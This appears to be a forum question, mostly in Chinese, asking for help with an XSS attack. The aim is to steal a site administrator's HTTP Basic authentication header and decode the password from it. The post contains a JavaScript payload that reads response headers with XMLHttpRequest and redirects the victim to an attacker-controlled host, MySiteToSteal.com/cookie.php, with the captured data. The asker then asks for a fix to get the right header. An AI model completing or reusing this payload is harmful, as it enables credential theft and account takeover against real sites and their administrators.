XSS Steal Authentication Basic with xmlhttprequest

Question

我正致力于安全性，我需要一件事来利用我的XSS漏洞：

我的目标是：   - 从管理员处获取Authentification Basic标题。

使用Authentification Basic，我可以解码base 64并从admin获取密码。

这是我的脚本有红色矩形：

var req = new XMLHttpRequest();
req.open('GET', document.location, false);
req.send(null);
var headers = req.getResponseHeader().toLowerCase();
document.location="http://MySiteToSteal.com/cookie.php?cookies=" + headers;

有人可以帮助我获得好头吗？我需要绿色矩形：D